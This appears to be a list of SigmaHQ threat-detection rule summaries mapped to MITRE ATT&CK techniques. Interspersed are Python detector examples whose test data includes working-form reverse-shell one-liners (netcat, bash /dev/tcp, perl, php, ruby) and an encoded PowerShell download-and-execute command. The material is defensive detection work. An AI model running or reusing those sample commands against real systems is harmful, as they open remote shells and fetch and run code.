T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location

SigmaHQ source
T1068
imFileEvent

Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself. Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to

SigmaHQ source
T1068
imFileEvent

Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.

SigmaHQ source
T1059
imFileEvent

Detects suspicious files, based on their extension, being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files

SigmaHQ source
T1587.001
imFileEvent

Detects creation of ".vhd"/".vhdx" files by browser processes. Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls.

SigmaHQ source
T1071.001
imWebSession

Detects User Agent strings that end with an equal sign, which can be a sign of base64 encoding.

SigmaHQ source
T1071.001
imWebSession

Detects suspicious encoded User-Agent strings, as seen used by some malware.

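The two User-Agent entries above (a trailing "=" and an otherwise encoded UA) are easy to state but worth seeing on real-looking records. The following is an added example and not code from this catalog or from SigmaHQ: it parses combined-format web proxy lines, applies both checks, and decodes the UA when it is valid base64 that yields printable text. The log lines are constructed inline (the beacon UAs are built with `base64` at run time), and the combined-log regex and the 16-character minimum token length are assumptions of this example.

```python
from __future__ import annotations

import base64
import binascii
import re
import string

PRINTABLE = set(string.printable)

# Apache/nginx "combined" format: ip ident user [ts] "request" status bytes "referer" "ua"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')


def decode_if_base64(value: str) -> str | None:
    """Return decoded text if value is well-formed base64 yielding printable ASCII."""
    if not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value) or len(value) % 4:
        return None
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    text = raw.decode("ascii", errors="replace")
    return text if text and all(c in PRINTABLE for c in text) else None


def check_user_agent(ua: str) -> dict[str, object]:
    """Apply both catalog checks: trailing '=' and a decodable base64 body."""
    ends_with_equal = ua.rstrip().endswith("=")
    decoded = None
    # Try the whole UA first, then each token long enough to be a real payload.
    for cand in [ua.strip()] + ua.split():
        if len(cand) >= 16:
            decoded = decode_if_base64(cand)
            if decoded:
                break
    return {"ends_with_equal": ends_with_equal, "decoded": decoded,
            "suspicious": ends_with_equal or decoded is not None}


def scan_log(lines: list[str]) -> list[dict[str, object]]:
    """Return one result per suspicious line, with the client IP and raw UA attached."""
    out: list[dict[str, object]] = []
    for line in lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue
        res = check_user_agent(m["ua"])
        if res["suspicious"]:
            res.update(ip=m["ip"], ua=m["ua"])
            out.append(res)
    return out


def sample_log() -> list[str]:
    """Constructed proxy log lines, not real telemetry."""
    beacon_padded = base64.b64encode(b"id=1337;host=WIN-01").decode()        # ends with "=="
    beacon_unpadded = base64.b64encode(b"WIN-01|bob|x64|build-100").decode()  # 24 bytes: no "="
    browser = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36")
    fmt = '10.0.0.{n} - - [01/May/2024:10:00:0{n} +0000] "GET /{p} HTTP/1.1" 200 512 "-" "{ua}"'
    return [fmt.format(n=5, p="index.html", ua=browser),
            fmt.format(n=6, p="gate.php", ua=beacon_padded),
            fmt.format(n=7, p="api/v1", ua=beacon_unpadded)]


if __name__ == "__main__":
    for hit in scan_log(sample_log()):
        print(hit["ip"], hit["ua"], "->", hit["decoded"])
```

The trailing "=" check alone misses payloads whose length is a multiple of three bytes (the third sample line), which is why the decode step is worth the extra cost; restrict it to UAs that are not in your browser allow-list to keep the volume down.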
SigmaHQ source
T1505.003T1190
imProcessCreate

Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.

SigmaHQ source
imProcessCreate

Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.

SigmaHQ source
T1005
imProcessCreate

Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information.

SigmaHQ source
T1102
imNetworkSession

Detects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as "OffensiveNotion C2"

SigmaHQ source
T1567T1105
imProcessCreate

Detects a suspicious curl process start that adds a file to a web request

SigmaHQ source
T1059
imProcessCreate

Detects usage of "xterm" as a potential reverse shell tunnel

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects abuse of Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD accou

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"

SigmaHQ source
T1047T1059.001T1059.003T1059.005T1059.007T1218T1218.001T1218.010T1218.011T1566T1566.001
imProcessCreate

Detects a suspicious child process of a Microsoft HTML Help (HH.exe)

SigmaHQ source
T1218
imProcessCreate

Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary

SigmaHQ source
imProcessCreate

Detects execution of the bash shell with the interactive flag "-i".

SigmaHQ source
T1059
imProcessCreate

Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup.

SigmaHQ source
imProcessCreate

Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity

SigmaHQ source
imProcessCreate

Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets. Attackers often lever

SigmaHQ source
imProcessCreate

Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to setup a reverse shell

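The six Linux entries above (bash -i, netcat -e, perl -e, php -r with fsockopen, ruby -e with socket calls, and xterm) are individual rules; in practice they are one detector run over process-creation events. The following is an added example and not code from this catalog or from SigmaHQ: it parses the command line into argv so flags are matched as real arguments, then applies each pattern. It goes one step beyond the entries by also flagging bash's `/dev/tcp/` pseudo-device. The sample events are constructed, and the exact keyword lists (for example "use socket"/"socket("/"connect(" for perl) are assumptions of this example.

```python
from __future__ import annotations

import shlex
from pathlib import PurePosixPath

SHELLS = {"sh", "bash", "dash", "ash", "zsh", "ksh", "fish"}
NETCATS = {"nc", "ncat", "netcat"}


def _is_shell(arg: str) -> bool:
    return PurePosixPath(arg).name in SHELLS


def detect_reverse_shell(cmdline: str) -> list[str]:
    """Names of the interactive/reverse-shell patterns matched by a command line.

    Flags are checked against parsed argv (so "-e" inside a quoted script does
    not count); keyword checks use the lower-cased raw command line.
    """
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return ["unparseable_command_line"]
    if not argv:
        return []
    prog = PurePosixPath(argv[0]).name
    args = argv[1:]
    lowered = cmdline.lower()
    hits: list[str] = []

    if prog == "bash" and "-i" in args:
        hits.append("bash_interactive")
    if prog in NETCATS:
        for flag, target in zip(args, args[1:]):
            if flag == "-e" and _is_shell(target):
                hits.append("netcat_exec_shell")
                break
    if prog.startswith("perl") and "-e" in args and any(
            s in lowered for s in ("use socket", "socket(", "connect(")):
        hits.append("perl_socket")
    if prog.startswith("php") and "-r" in args and "fsockopen" in lowered:
        hits.append("php_fsockopen")
    if prog.startswith("ruby") and "-e" in args and "socket" in lowered:
        hits.append("ruby_socket")
    if prog == "xterm" and "-display" in args:
        hits.append("xterm_display")
    # Beyond the catalog entries: bash's network pseudo-device, no binary needed.
    if "/dev/tcp/" in lowered or "/dev/udp/" in lowered:
        hits.append("dev_tcp_redirect")
    return hits


# Constructed process-creation command lines, not real telemetry.
SAMPLE_EVENTS = {
    "nc_shell": "nc -e /bin/sh 10.0.0.1 4444",
    "bash_devtcp": "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1",
    "perl_shell": ("perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));"
                   "connect(S,sockaddr_in(4444,inet_aton(\"10.0.0.1\")));exec(\"/bin/sh -i\");'"),
    "php_shell": "php -r '$sock=fsockopen(\"10.0.0.1\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
    "ruby_shell": ("ruby -rsocket -e 'c=TCPSocket.new(\"10.0.0.1\",4444);"
                   "while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'"),
    "xterm_tunnel": "xterm -display 10.0.0.1:1",
    "benign_bash": "bash -c \"ls -la /tmp\"",
    "benign_nc_scan": "nc -zv 10.0.0.5 443",
    "benign_perl": "perl -e 'print \"hello\\n\"'",
    "benign_php": "php -r 'echo date(\"c\");'",
}


def scan_events(events: dict[str, str] = SAMPLE_EVENTS) -> dict[str, list[str]]:
    return {name: detect_reverse_shell(cmd) for name, cmd in events.items()}


if __name__ == "__main__":
    for name, hits in scan_events().items():
        print(f"{name:15} {hits}")
```

The benign cases matter as much as the positives: `nc -zv` port checks and `perl -e 'print ...'` one-liners are everyday administrator activity, and a rule that matches on the flag alone will drown the real hits.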
SigmaHQ source
T1218
imProcessCreate

Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system

SigmaHQ source
T1123
imProcessCreate

Detects audio capture via PowerShell Cmdlet.

aptpowershell
SigmaHQ source
T1140T1059.001
imProcessCreate

Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line

powershell
SigmaHQ source
T1059.001
imProcessCreate

Detects usage of a base64 encoded "IEX" cmdlet in a process command line

powershell
SigmaHQ source
T1059.001T1027
imProcessCreate

Detects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly"

SigmaHQ source
T1204.002
DeviceImageLoadEvents

Detects CLR DLL being loaded by an Office Product

SigmaHQ source
T1204.002
DeviceImageLoadEvents

Detects any assembly DLL being loaded by an Office Product

SigmaHQ source
T1059
imProcessCreate

Detects potential process patterns related to Cobalt Strike beacon activity

cobalt-strike
SigmaHQ source
T1036
imProcessCreate

Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline

evasion
SigmaHQ source
T1059
imFileEvent

Detects Windows shells and scripting applications that write files to suspicious folders

SigmaHQ source
T1047
imProcessCreate

Detects WmiPrvSE spawning a process

wmi
SigmaHQ source
T1059
imProcessCreate

Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer)

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects DLL sideloading of DLLs that are part of Microsoft Office from a non-standard location

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects potential DLL sideloading of rcdll.dll

SigmaHQ source
T1132.001
imProcessCreate

Detects attempts of decoding encoded Gzip archives via PowerShell.

powershell
SigmaHQ source
T1112
imRegistry

Detects a registry key used by IceID in a campaign that distributes malicious OneNote files

SigmaHQ source
T1070
imProcessCreate

Detects Linux package removal using built-in tools such as "yum", "apt", "apt-get" or "dpkg".

SigmaHQ source
T1685
imProcessCreate

Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon

SigmaHQ source
T1047T1053T1059.003T1059.001T1110T1201
imProcessCreate

Detects common flag combinations used by CrackMapExec, in order to detect its use even if the binary has been replaced.

SigmaHQ source
imProcessCreate

The rule detects the use of Wmiexec via PowerShell with specific command-line flags, a

lateral-movementpowershellwmi
SigmaHQ source
T1047
imFileEvent

Detects the creation of the default output filename used by the wmiexec tool

SigmaHQ source
T1490
imProcessCreate

Detects the execution of the builtin "copy" command that targets a shadow copy (sometimes used to copy registry hives that are in use)

SigmaHQ source
imProcessCreate

Adversaries may use NtdllPipe techniques to exfiltrate or execute malicious code by leveraging ntdll.dll content, evading traditional AV/EDR detection mechanisms. SOC teams should pro

SigmaHQ source
T1546.008
imProcessCreate

By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system. When the sticky k

backdoorpersistence
SigmaHQ source
T1546.008
imProcessCreate

Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen

backdoor
SigmaHQ source
T1036
imProcessCreate

Detects a code page switch in command line or batch scripts to a rare language

SigmaHQ source
T1059.001
imProcessCreate

Detects Windows command lines that miss a space before or after the /c flag when running a command using cmd.exe. This could be a sign of obfuscation or a fat-finger problem (typo by the developer

evasion
SigmaHQ source
T1059
imProcessCreate

Detects possible payload obfuscation via the commandline

evasion
SigmaHQ source
T1003.002T1003.003
imProcessCreate

Detects creation of a symbolic link to the Shadow Copies storage using operating system utilities

backdoor
SigmaHQ source
T1218.011
imProcessCreate

F-Secure C3 produces DLLs with a default exported StartNodeRelay function.

SigmaHQ source
T1059
imProcessCreate

Detects process activity patterns as seen being used by Sliver C2 framework implants

SigmaHQ source
T1112
imRegistry

Detects potential registry persistence technique using the Event Viewer "Events.asp" technique

persistence
SigmaHQ source
T1036.003T1036T1027.005T1027
imProcessCreate

Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.

evasion
SigmaHQ source
T1567.002
imProcessCreate

Detects execution of the RClone utility for exfiltration, as used by various ransomware strains like REvil, Conti, FiveHands, etc.

backdoorransomware
SigmaHQ source
T1087.002
imProcessCreate

Detects active directory enumeration activity using known AdFind CLI flags

backdoor
SigmaHQ source
T1219.002
imProcessCreate

Detects piping the password to an AnyDesk instance via CMD and the '--set-password' flag.

SigmaHQ source
T1219.002
imProcessCreate

Detects AnyDesk Remote Desktop silent installation, which can be used by attackers to gain remote access.

SigmaHQ source
T1219.002
imProcessCreate

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target

SigmaHQ source
T1219.002
imProcessCreate

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target

SigmaHQ source
imProcessCreate

Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\Program Files')

backdoor
SigmaHQ source
T1219.002
imProcessCreate

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target

SigmaHQ source
T1053.005T1059.001
imProcessCreate

Detects the creation of a schtask via PowerSploit or Empire Default Configuration.

backdoor
SigmaHQ source
T1140
imProcessCreate

Detects potential commandline obfuscation using known escape characters

evasion
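
The command-line obfuscation entries (escape characters here, the missing space around /c, bogus path traversal, and the generic payload-obfuscation entry) all reduce to a few string checks that are easy to get subtly wrong. The following is an added example and not code from this catalog or from SigmaHQ: it flags caret and empty-quote insertion, a /c glued to cmd.exe or to the command that follows it, and path traversal such as `C:\Windows\..\Windows\System32\`, which it also resolves with `ntpath.normpath` so the analyst sees the real target. The sample command lines are constructed and the list of commands considered after a glued /c is an assumption of this example.

```python
from __future__ import annotations

import ntpath
import re

# Assumed list of commands seen glued to "/c" (e.g. "/cpowershell").
GLUED_COMMANDS = ("whoami", "powershell", "pwsh", "schtasks", "bitsadmin", "certutil",
                  "rundll32", "regsvr32", "wmic", "net", "reg", "echo", "start", "ping",
                  "mshta", "wscript", "cscript")

# "cmd.exe/c" or "cmd/c", or a /c that is directly followed by a command word.
NO_SPACE_RE = re.compile(
    r"cmd(?:\.exe)?/c|(?<=\s)/c(?:" + "|".join(GLUED_COMMANDS) + r")\b", re.I)
CARET_RE = re.compile(r"\w\^\w")                 # p^o^w^e^r^s^h^e^l^l
QUOTE_SPLIT_RE = re.compile(r"\w(?:\"\"|'')\w")  # pow""ershell
WIN_PATH_RE = re.compile(r"[A-Za-z]:\\[^\s\"'<>|]+")


def analyze_command_line(cmdline: str) -> dict[str, list[str]]:
    """Flag cheap command-line obfuscation tricks and resolve bogus path traversal."""
    findings: list[str] = []
    resolved: list[str] = []

    if NO_SPACE_RE.search(cmdline):
        findings.append("cmd_c_missing_space")
    if CARET_RE.search(cmdline) or cmdline.count("^") >= 3:
        findings.append("caret_escape_characters")
    if QUOTE_SPLIT_RE.search(cmdline):
        findings.append("empty_quote_insertion")

    # C:\Windows\..\Windows\System32\x.exe still runs x.exe from System32, but a
    # plain substring match on "\Windows\System32\" does not see it.
    for path in WIN_PATH_RE.findall(cmdline):
        canonical = ntpath.normpath(path)
        if canonical.lower() != path.lower():
            findings.append("bogus_path_traversal")
            resolved.append(canonical)
    return {"findings": findings, "resolved_paths": resolved}


# Constructed samples, not real telemetry.
SAMPLES = {
    "glued_exe": "cmd.exe/c whoami",
    "glued_cmd": "cmd /cpowershell -w hidden -nop",
    "carets": "cmd /c p^o^w^e^r^s^h^e^l^l -nop -c calc",
    "quotes": 'cmd /c pow""ershell -c calc',
    "traversal": r'cmd /c "C:\Windows\..\Windows\System32\rundll32.exe" shell32.dll,Control_RunDLL',
    "benign": 'cmd /c "echo hello"',
    "benign_path": r'"C:\Program Files\Git\bin\git.exe" status',
}


if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        print(f"{name:12} {analyze_command_line(cmd)}")
```

Normalising the path before matching is the general lesson: any rule keyed on a directory name should compare against the canonical path, otherwise a single `\..\` segment defeats it.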
SigmaHQ source
imProcessCreate

Detects execution of the Notepad++ updater (gup) to launch other commands or executables

SigmaHQ source
T1003T1003.001
imProcessCreate

Detects a suspicious LSASS process clone that could be a sign of credential dumping activity

credential-theft
SigmaHQ source
T1098
imProcessCreate

Detects addition of users to the local administrator group via "Net" or "Add-LocalGroupMember".

backdoor
SigmaHQ source
T1106T1059.003T1218.011
imProcessCreate

Detects actions caused by the RedMimicry Winnti playbook, an automated breach emulation utility

Procdump Execution
sigma medium
SigmaHQ source
T1036T1003.001
imProcessCreate

Detects usage of the SysInternals Procdump utility

SigmaHQ source
imProcessCreate

Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest

backdoorlateral-movement
SigmaHQ source
T1021.002T1570T1569.002
imProcessCreate

Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module

exploitlateral-movement
SigmaHQ source
T1036.007
imProcessCreate

Detects execution of suspicious double-extension files in ParentCommandLine

SigmaHQ source
imFileEvent

Detects suspicious files created via the OneNote application. This could indicate a potential malicious ".one"/".onepkg" file was executed as seen being used in malware activity in the wild

SigmaHQ source
T1055
DeviceImageLoadEvents

Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.

SigmaHQ source
T1547.001
imFileEvent

Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities

SigmaHQ source
T1547.001
imFileEvent

Detects PowerShell writing startup shortcuts. This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files i

SigmaHQ source
T1136.002T1543.003T1570
imFileEvent

Detects creation of the PsExec key file, which is created any time a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system

SigmaHQ source
T1218
imFileEvent

Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context

SigmaHQ source
imFileEvent

Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well-known directories (Local, Roaming, LocalLow). This method could be used

SigmaHQ source
T1059.003
imProcessCreate

Detects the use of Jlaive to execute assemblies in a copied PowerShell

powershell
SigmaHQ source
T1566.001
imFileEvent

Detects the creation of an Office macro file from a suspicious process

SigmaHQ source
T1137.003
imFileEvent

Detects the creation of a new Outlook form which can contain malicious code

SigmaHQ source
T1546.003
DeviceImageLoadEvents

Detects the WMI script host process "scrcons.exe" loading scripting DLLs, which could indicate WMI ActiveScriptEventConsumer activity.

SigmaHQ source
T1685.001
imProcessCreate

Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability. This can be carried out by selec

backdoor
SigmaHQ source
T1059.001T1564.003
imProcessCreate

Detects suspicious command lines used in Covenant launchers

powershell
SigmaHQ source
T1059.001
imProcessCreate

Detects suspicious PowerShell command line parameters used in Empire

powershell
SigmaHQ source
T1548.002
imProcessCreate

Detects some Empire PowerShell UAC bypass methods

evasionpowershell
SigmaHQ source
T1003.001T1003.002T1003.004T1003.005T1003.006
imProcessCreate

Detects well-known Mimikatz command line arguments

credential-theft
SigmaHQ source
T1047T1021.003
imProcessCreate

Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework

lateral-movementwmi
SigmaHQ source
T1572
imProcessCreate

Detects the use of 3proxy, a tiny free proxy server

SigmaHQ source
T1018
imProcessCreate

This tool enables enumeration and export of all DNS records in the zone for reconnaissance of internal networks. Python 3 and python.exe must be installed. Used to query/modify DNS records for Activ

backdoor
SigmaHQ source
T1134.002
imProcessCreate

Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts

SigmaHQ source
T1587.001T1569.002
imProcessCreate

Detects the use of the lesser-known remote execution tool CsExec, a PsExec alternative

lateral-movement
SigmaHQ source
T1003.003
imProcessCreate

Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.

SigmaHQ source
T1056.002
imProcessCreate

In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool "Mouse Lock" as being used for both credential access and collection in security incidents.

credential-theft
SigmaHQ source
T1572
imProcessCreate

Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available. Involved domains are bin.equinox.io for dow

SigmaHQ source
T1105
imProcessCreate

Detects a suspicious curl process start on Windows that writes the requested document to a local file

SigmaHQ source
T1543.003
imProcessCreate

Detects the creation of a new service using PowerShell.

powershell
SigmaHQ source
T1040
imProcessCreate

Detects potential network sniffing via use of network tools such as "tshark", "windump". Network sniffing refers to using the network interface on a system to monitor or capture information sent over

apt
SigmaHQ source
T1202
DeviceImageLoadEvents

Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the "sdiageng.dll" library

SigmaHQ source
T1218.003
DeviceImageLoadEvents

Detects cmstp loading "dll" or "ocx" files from suspicious locations

SigmaHQ source
T1027.004
imFileEvent

When C# is compiled dynamically, a .cmdline file will be created as a part of the process. Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can

SigmaHQ source
T1071
DeviceImageLoadEvents

Detects SILENTTRINITY stager dll loading activity

SigmaHQ source
T1574.001
DeviceImageLoadEvents

Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL

SigmaHQ source
T1070
imFileEvent

Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence

Backup Files Deleted
sigma medium
SigmaHQ source
T1490
imFileEvent

Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrup

SigmaHQ source
T1070
imFileEvent

Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence

SigmaHQ source
T1070.004
imFileEvent

Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.

SigmaHQ source
T1070
imFileEvent

Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence

SigmaHQ source
T1070
imFileEvent

Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence

SigmaHQ source
T1070.004
imFileEvent

Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence

SigmaHQ source
T1133
imFileEvent

Detects an unexpected file being deleted by dns.exe, which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)

SigmaHQ source
T1685.001
imProcessCreate

Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs

SigmaHQ source
T1546.003
imProcessCreate

Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence

persistencewmi
SigmaHQ source
T1557.001
imProcessCreate

Detects different hacktools used for relay attacks on Windows for privilege escalation

SigmaHQ source
T1685
imProcessCreate

Detects uninstallation or termination of security products using the WMIC utility

wmi
SigmaHQ source
T1685
imProcessCreate

Detects the use of CleanWipe, a tool usually used to delete Symantec antivirus.

SigmaHQ source
T1569.002
imProcessCreate

Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts

SigmaHQ source
T1555.003
imProcessCreate

Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All

SigmaHQ source
imProcessCreate

Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines

powershell
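
The three "base64 encoded" entries further up (FromBase64String, IEX, and the LOAD keyword in reflection.assembly) and the UTF-16/base64 entry just above rely on one non-obvious fact: the base64 form of a keyword depends on its byte offset modulo 3 and on whether the text is ASCII or UTF-16LE, so each keyword has six possible encodings. The following is an added example and not code from this catalog or from SigmaHQ: it derives those variants mechanically, scans command lines for any of them, and decodes a `-EncodedCommand` argument for triage. The sample command lines are constructed in the code; the keyword list and the `-e/-ec/-enc/-encodedcommand` regex are assumptions of this example.

```python
from __future__ import annotations

import base64
import re

# Keywords the catalog entries hunt for inside encoded PowerShell (assumed list).
KEYWORDS = ("IEX", "Invoke-Expression", "FromBase64String", "Reflection.Assembly")


def b64_variants(keyword: str) -> set[str]:
    """Base64 substrings that can appear when `keyword` occurs in encoded data.

    Base64 consumes bytes three at a time, so the encoding depends on the
    keyword's byte offset modulo 3 and on its text encoding (ASCII, or the
    UTF-16LE that -EncodedCommand uses). Each offset is emulated by prepending
    0, 1 or 2 dummy bytes; characters that mix dummy bits with keyword bits
    are dropped, as is the last character when it would also carry bits of
    whatever byte follows the keyword.
    """
    variants: set[str] = set()
    for raw in (keyword.encode("ascii"), keyword.encode("utf-16-le")):
        for pad in range(3):
            enc = base64.b64encode(b"\x00" * pad + raw).decode("ascii").rstrip("=")
            start = (0, 2, 3)[pad]                       # chars tainted by dummy bytes
            end = len(enc) - (1 if (pad + len(raw)) % 3 else 0)
            variants.add(enc[start:end])
    return variants


# Map every variant back to the keyword it encodes.
VARIANT_INDEX = {v: kw for kw in KEYWORDS for v in b64_variants(kw)}

ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)


def scan_command_line(cmdline: str) -> list[str]:
    """Keywords whose base64 form (at any alignment) appears in the command line."""
    return sorted({kw for v, kw in VARIANT_INDEX.items() if v in cmdline})


def decode_encoded_command(cmdline: str) -> str | None:
    """Decode a -EncodedCommand argument (base64 of UTF-16LE) for analyst triage."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def sample_events() -> dict[str, str]:
    """Constructed command lines, not real telemetry; payloads are encoded here."""
    downloader = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
    enc_ps = base64.b64encode(downloader.encode("utf-16-le")).decode()
    enc_ascii = base64.b64encode(b"echo IEX done").decode()   # "IEX" at offset 5
    benign = base64.b64encode("Get-Date".encode("utf-16-le")).decode()
    return {
        "encoded_downloader": "powershell.exe -nop -w hidden -enc " + enc_ps,
        "ascii_blob": ("cmd.exe /c powershell -c \"[Text.Encoding]::ASCII.GetString("
                       "[Convert]::FromBase64String('" + enc_ascii + "'))\""),
        "benign": "powershell.exe -enc " + benign,
    }


if __name__ == "__main__":
    for name, cmd in sample_events().items():
        print(name, scan_command_line(cmd), decode_encoded_command(cmd))
```

For "IEX" the derivation yields SUVY, lFW and JRV (ASCII) and SQBFAFgA, kARQBYA and JAEUAWA (UTF-16LE). The two three-character ASCII variants are short enough to collide inside unrelated base64 blobs, so treat a hit on them as a lead to decode rather than an alert on its own.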
SigmaHQ source
T1047
imProcessCreate

Adversaries may leverage WMIC.EXE to execute malicious processes like rundll32 or regsvr32

wmi
SigmaHQ source
imProcessCreate

Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)

persistence
SigmaHQ source
T1202
imProcessCreate

Detects the execution of Windows binaries from within a WSL instance. This could be used to masquerade parent-child relationships

SigmaHQ source
T1003.001
imProcessCreate

Detects suspicious process patterns found in logs when CrackMapExec is used

SigmaHQ source
T1090.001
imProcessCreate

Detects usage of the Sharp Chisel via the commandline arguments

SigmaHQ source
T1615T1569.002T1574.005
imProcessCreate

Detects the use of SharpUp, a tool for local privilege escalation

SigmaHQ source
T1071
imProcessCreate

Detects SILENTTRINITY stager use via PE metadata

SigmaHQ source
T1021.006
imProcessCreate

Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.

SigmaHQ source
T1496
imProcessCreate

Detects command line parameters or strings often used by crypto miners

SigmaHQ source
T1090.001
imProcessCreate

Detects usage of the Chisel tunneling tool via the commandline arguments

SigmaHQ source
T1569.002
imProcessCreate

Detects the use of NirCmd tool for command execution as SYSTEM user

SigmaHQ source
T1005
imProcessCreate

Detects dump of credentials in VeeamBackup dbo

credential-theft
SigmaHQ source
T1204.002
DeviceImageLoadEvents

Detects any GAC DLL being loaded by an Office Product

SigmaHQ source
T1204.002
DeviceImageLoadEvents

Detects VB DLLs loaded by an Office application, which could indicate the presence of VBA macros.

SigmaHQ source
T1059T1202
imProcessCreate

Detects an attacker trying to enable the Outlook security setting "EnableUnsafeClientMailRules", which allows Outlook to run applications or execute macros

SigmaHQ source
T1059T1202
imProcessCreate

